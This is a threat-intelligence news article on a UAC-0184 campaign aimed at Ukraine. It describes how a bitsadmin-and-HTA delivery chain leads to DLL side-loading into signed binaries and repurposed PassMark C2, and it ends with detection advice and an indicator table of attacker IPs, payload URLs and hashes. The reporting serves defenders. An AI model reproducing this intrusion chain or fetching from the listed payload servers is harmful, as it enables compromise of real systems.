UAC-0184 Malware Chain Uses bitsadmin and HTA Files for Gated Payload Delivery

A newly documented attack chain linked to the threat group UAC-0184 has been observed using Windows’ built-in bitsadmin tool and HTA files to sneak malicious payloads onto targeted systems.

The campaign is primarily aimed at Ukraine, with clear indicators pointing toward military-related targets, including individuals connected to the Ukrainian Defence Forces.

The level of craft and patience displayed across every stage of this infection chain sets it apart from noisier, less disciplined campaigns that have surfaced recently.

The attackers use social engineering lures built around topics like criminal proceedings, combat videos, and personal contact requests to trick victims into opening malicious files.

Once a victim opens the booby-trapped document, whether it appears as a PDF, a Word file, or an Excel spreadsheet, bitsadmin quietly fetches an HTA file from an attacker-controlled remote server in the background.

That HTA file is then executed using mshta.exe, pushing the infection forward without raising any immediate alarms on the compromised machine.

Analysts at Synaptic Security said in a report shared with Cyber Security News (CSN) that the delivery mechanism appears gated, meaning the payload is only served to systems that pass certain filtering criteria, which likely helps screen out sandboxes and security researcher environments.

This kind of conditional delivery makes the malware significantly harder to study and allows the attackers to remain active without drawing unwanted attention for extended stretches of time.

The HTA file, once executed, runs a hidden PowerShell command that downloads a ZIP archive named dctrprraclus.zip from the attacker-controlled server at IP address 169.40.135.35.

UAC-0184 Malware Chain

The archive unpacks into a folder inside the AppData directory and launches two files side by side, a music visualizer application called Cluster-Overlay64.exe along with a decoy PDF named Scan_001.pdf.

The PDF is shown to the victim as a distraction while the real infection continues quietly and undetected in the background on their machine.

The broader toolset that UAC-0184 deploys reveals considerable operational sophistication. The final stage of the infection chain involves PassMark BurnInTest network components being repurposed as a covert command-and-control channel, listening on UDP port 31339 for multicast peer discovery traffic.

This abuse of a legitimate, Microsoft-signed software stack gives the attacker a convincing cover identity deep inside a trusted process tree.

The use of bitsadmin for downloading files is not new, but pairing it with HTA file execution is a deliberate technique that helps the attacker blend in with normal Windows background activity.

Bitsadmin is a native Windows command-line tool originally built for background file transfers, and its abuse by threat actors often goes unnoticed by both everyday users and many endpoint security products.

Once the HTA file executes, it drops a layered package containing Cluster-Overlay64.exe, openvr_api.dll, filter.bin, and kernel-diag.lib inside the ApplicationData32 folder. The actual malicious code is not sitting inside the main executable.

Instead it is buried inside DLL files and encoded local blobs, decrypted at runtime through a multi-stage process combining XOR operations with LZNT1 decompression.

The final payload is then side-loaded into VSLauncher.exe, a legitimate Microsoft-signed Visual Studio binary that wraps it in a trustworthy digital identity.

Signed Software Repurposed as a Cover Identity

One of the most striking aspects of this campaign is how aggressively the threat actor leans on legitimate, signed software to mask malicious behavior from defenders.

PassMark Endpoint, a genuine commercial network testing utility, becomes the final network-facing component, carrying capabilities including process memory dumping via MiniDumpWriteDump and peer data transfer over TCP port 31339.

Defenders are advised to monitor for bitsadmin and mshta.exe being used together, especially when paired with suspicious temporary file name patterns like ~tmp(…).hta.

Network teams should watch for UDP traffic toward 224.0.0.255 on port 31339, which is the PassMark multicast discovery address that this campaign repurposes for its own communication.

The presence of VSLauncher.exe running outside a legitimate Visual Studio installation path, or any unexpected file creation events inside %APPDATA%ApplicationData32, should be treated as serious warning signs that warrant immediate investigation by security teams.

Indicators of Compromise (IoCs):-

Type	Indicator	Description
IP Address	169.40.135.35	Attacker-controlled C2 server hosting HTA files and payload archive
URL	hxxp://169.40.135.35/dctrpr/slippersuppity.hta	HTA stage-1 payload URL (PDF lure variant)
URL	hxxp://169.40.135.35/dctrpr/basketpast.hta	HTA stage-1 payload URL (Word document lure variant)
URL	hxxp://169.40.135.35/dctrpr/agentdiesel.hta	HTA stage-1 payload URL (Excel lure variant)
URL	hxxp://169.40.135.35/dctrprraclus.zip	Payload ZIP archive download URL
SHA-256	81d93004a02a455af01b0f709e34d5134108ec350f9391dc0f91a00a54998590	ZIP archive (dctrprraclus.zip)
SHA-256	dc6cddc391b373b18f105f49a80ff83d53b430d8dea35c1f1576832fa9fbd2b3	kernel-diag.lib (encoded payload loader)
SHA-256	f5ca9c53d1537142889d7172c6643e886b2164233b91f0fc2d41ca010f035372	filter.bin (XOR-encrypted secondary payload)
SHA-256	df6942dc1a89226359adf1aac597c3b270f4a408214b4f7c2083f9524605e0f7	openvr_api.dll (DLL sideload component)
SHA-256	b811f28b844eff8c1f4f931639bed5bcc41113364fdfc44d7703259457839edb	input.dll (PassMark Endpoint sideloaded payload)
SHA-256	33e44dea247eaa8b0fc8ed1f8ed575905f6ce0b7119337ddd29863bbb03288b3	PE_08 / SqlExpressChk.exe (bundled PE component)
File Path	%APPDATA%ApplicationData32Cluster-Overlay64.exe	Dropped music visualizer used as sideload host
File Path	%APPDATA%ApplicationData32openvr_api.dll	Dropped DLL containing loader logic
File Path	%APPDATA%ApplicationData32filter.bin	Dropped XOR-encrypted payload blob
File Path	%APPDATA%ApplicationData32kernel-diag.lib	Dropped DWORD-XOR encoded loader blob
File Path	%windir%SysWOW64input.dll	PassMark Endpoint DLL dropped for sideloading
File Path	%windir%SysWOW64VSLauncher.exe	Microsoft-signed sideload host (Visual Studio Version Selector)
Network	224.0.0.255:31339 (UDP)	PassMark BurnInTest multicast discovery, repurposed for C2 peer discovery
Network	31339/tcp	BurnInTest peer data channel, repurposed for C2 data transfer
File Name Pattern	~tmp(…).hta	Temporary HTA file pattern written to %TEMP% during initial execution

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.